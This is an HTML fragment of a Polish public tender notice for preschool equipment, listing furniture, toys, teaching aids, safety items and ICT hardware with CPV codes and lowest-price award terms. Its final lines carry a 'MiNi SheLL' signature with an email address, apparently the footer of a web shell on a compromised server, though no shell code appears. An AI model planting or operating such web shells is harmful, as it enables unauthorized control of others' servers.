<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.10.00-7, 39.70.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wyposażenie sal dydaktycznych i szatni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem tej części zamówienia jest dostawa i montaż następującego wyposażenia: 
Zestaw mebli szt. 1
Szafka na prace szt. 2
Szafka z przesuwanymi drzwiami szt. 2
Szafka wysoka z drzwiczkami  szt. 2
Pufa do biblioteczki szt. 1
Dywan 2x3 m szt. 2
Tablica suchościeralna 100x 170 szt. 1
Szafka jeż szt. 1
Labirynt na nogi t. ślimaczek szt. 1
Labirynt na nogi t. wąż szt. 1
Stół prostokątny 0-3 szt. 4
Krzesło w rozmiarze  2 szt. 6
Krzesło w rozmiarze  nr 1 szt. 18
Zestaw mebli szt. 1
Regał  z 3 półkami klon szt. 1
Szafka z drzwiami do mocowania plakatów - klon szt.1
Plakat do szafek - Kształty szt. 1
Plakat do szafek - Kolory szt. 1
Biurko z szafką i szufladą - klon szt. 1
Krzesło konferencyjne szt. 1
Biblioteczka z ławeczką szt. 1
Dywan 3x4 szt. 1
Tablica biała magnet. Duża szt. 1
Tablica biała magnet. Duża szt. 1
Tablica wisząca szt. 1
Suszarka metalowa szt. 1 
Przesuwanka - Drzewo duże szt. 1
Naklejki na ścianie sowy na drzewie szt.1
Wózek na prace plastyczne- klon szt. 1
Pojemniki płytkie - żółty szt. 5
Zestaw dekoracji szt. 1
Zakup i montaż rolet okiennych szt. 1
Pufa t. piesek szt. 2
Pufa t. tygrys szt. 1
Pufa t. biedronka szt. 2
Pufa t. baranek szt. 1
Pufa t. żółw szt. 2
Pufa t. kotek szt. 2
Gruszka mała czerwona szt. 2
Gruszka mała fioletowa szt. 2
Poducha sensoryczna myszka szt. 2
Poduch t. myszka szt. 2
Poducha t. rybka szt. 1
Poduszka  kolor mix szt. 4
Poduszki okrągłe ( 10 szt.) szt. 2
Bajkowy materac 3 częściowy. szt. 2
Materac narożny t. serce szt. 1
Kanapka rozkładana szt. 2
Kanapka śpiący miś szt. 1
Ławeczka szatniowa regulow. z wieszakiem - buk szt. 1
Ławeczka szatniowa - buk szt. 1
Wieszak szatniowy - buk szt. 1
Szafa ubraniowa - klon szt. 2
Metalowa szafa gosp. Szt. 2
Regał magazynowy szt. 1
Regał metalowy 170 szt. 1
Szatnia - duża szt. 3
Szatnia - mała szt. 1
Szczegółowo opis tej części przedmiotu zamówienia zawarty jest załączniku Nr 7 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.10.00-8, 39.50.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zabawki, pomoce dydaktyczne i artykuły plastyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem tej części zamówienia jest dostawa następujących przedmiotów:
Zabawki:
Zestaw narzędzi	 10szt.
Zestaw perkusyjny	4szt.
Bujak jamnik	2szt.
Szczęśliwy traf żabki 2szt.
Matematyczny twister 2szt.
Skakanka 1 szt.	50
Piłka - 30cm	10szt.
Miękka mała lalka 2szt.
Lalka płacząca	2szt.
Lalka mała z nocnikiem 2szt.
Lalka siusiająca	 szt.2
Lala do ćwiczeń i nauki	2 szt.
Bobas	2szt.
Lalka duża	  2szt.
Lalka z akcesoriami do robienia fryzur	2szt.
Łóżeczko dla lalek	2szt.
Medyczny wózek	6szt.
Duża kuchnia	2szt.
Mały samochód terenowy czerwony	2szt.
Pojemnik	6szt.
Kasa sklepowa ze skanerem	2szt.
Piłka do skakania 45 cm	6szt.
Piłka do skakania 55 cm	6szt.
Ringo Sensoryczne	30szt.
Koło latające	30szt.
Tunel typu Stonoga	2szt.
Woreczki - kolory	6szt.
Miś	6szt.
Miś	4szt.
Duży zestaw obiadowy	6szt.
Straż pożarna	6szt.
Betoniarka	 6szt.
Koparka	6szt.
Nakładanka 	2szt.
Puzzle typu Przyjaciele z zoo 	2szt.
Puzzle typu Przyjaciele z gospodarstwa 	2szt.
Puzzle typu 4 warstwy pory roku	 2szt.
Puzzle typu 5 warstw dom	 2szt.
Domek letniskowy dla lalek	 2szt.
Mały zestaw do piasku (dla grupy) 2szt.
Klocki typu wesołe miasteczko	2 szt.
Klocki typu Leśne miasteczko 	2szt.
Kolorowe drewniane klocki	 2szt.
Geometryczne kształty z tworzywa 8szt.
Wywrotka  z podnoszoną skrzynią ładunkową i otwieraną tylną klapą 6szt.
Wywrotka	 6szt.
Wywrotka z akcesoriami 	8 szt.
Mata miasto	 2szt.
Śpiąca lalka	 8szt.
Pomoce dydaktyczne: 
Zestaw bajek typu grajek	- 2 szt.
Zestaw bajek typu grajek	- 2szt.
Gra typu rybki	2szt.
Gra typu Współpraca na krach 	2szt.
Książka z ćwiczeniami typu Uczmy się słówek 	50szt.
Skojarzenia - karty do angielskiego	2szt.
Mapa Polski dla najmłodszych	2szt.
Gra memory typu Flagi	3szt.
Gra planszowa nt.  Unii Europejskiej	1szt.
Plansze typu 4 sezonowe drzewa 2szt.
Gra planszowa nt. Sortowania odpadów	2szt.
Gra Domino nt.  Ekologii	10szt.
Magnetyczne plansze typu Bawmy się liczbami 	11szt.
Liczydło stojące	 2szt.
Magnetyczna linijka	2szt.
Zestaw zdjęć typu Umiejętności	2szt.
Dwustronne plansze tematyczne- pory roku, kolory, warzywa , owoce, dobre wychowanie, nasze ciało 7 szt.
Artykuły plastyczne:
Brystol mix A3/ 100 ark	30 szt.
Brystol biały A4/100 ark	30szt.
Wkład z kolorowego papieru rysunkowego A4/400 ark.	20szt.
bibuła - mix kolorów 15 rolek	4szt.
Nożyczki przedszkolne 10 szt.	6szt.
Taśma samoprzylepna 18 mm x 30 m	20szt.
Klej przezroczysty 200 ml	30szt.
Klej poj. 1l*	30szt.
Papier szary A3. 20 arkuszy	20szt.
Klasyczne markery zmywalne 8szt.	30szt.
Plastelina 12 kol.	50szt.
Kredki 12 kol w pud. kart. 	60szt.
Tempery 6 kolorów 6x1000 ml	10szt.
Zestaw pędzli do malowania 24 szt.	20
Tektura falista (10 arkuszy)	30szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.52.00.00-9, 37.82.00.00-2, 39.16.21.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wyposażenie zapewniające bezpieczne warunki opieki nad dziećmi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem tej części zamówienia jest dostawa i montaż następujących przedmiotów: 
Oznaczenie ewakuacyjne (8szt.)  szt. 2
Apteczka z wyposażniem metal. na ścianę szt. 2
Zabezpieczenia gniazdek elektr. ( 8 szt.) szt. 2
Zabezpieczenia kątowe mebli ( 4 szt.) szt. 6
Instrukcja udzielania pierwszej pomocy szt. 2
Gaśnica 4 kg szt. 1
Skrzynka na klucze ewakuac. metal. Szt. 1
Szafka medyczna szt. 1
Zakup i montaż zabudowy grzejników szt. 4
Zakup i montaż zabudowy grzejników szt. szt. 3
Szczegółowo opis tej części przedmiotu zamówienia zawarty jest załączniku Nr 7 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Sprzęt ICT.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem tej części zamówienia jest dostawa i montaż następujących urządzeń: Komputer wraz z oprogramowaniem szt. 2
Monitor LCD 19 cali szt. 1
Monitor LCD 22 cali  szt. 1
Skaner płaski szt. 1
Projektor krótkoogniskowy LCD szt. 2
Ekran projekcyjny 150x150 szt. 2
Notebook 17cali szt. 2
Telewizor 32 cali LCD szt. 2
Odtwarzacz DVD szt. 1
Odtwarzacz DVD szt. 1
Radioodtwarzacz CD szt. 2
Tablica interaktywna 80 cali szt. 1
Tablica interaktywna dotykowa, ceramiczna, magnetyczna wraz z oprogramowaniem szt. 1
Urządzenie wielofunkcyjne  szt.2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.19.50.00-2, 32.31.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com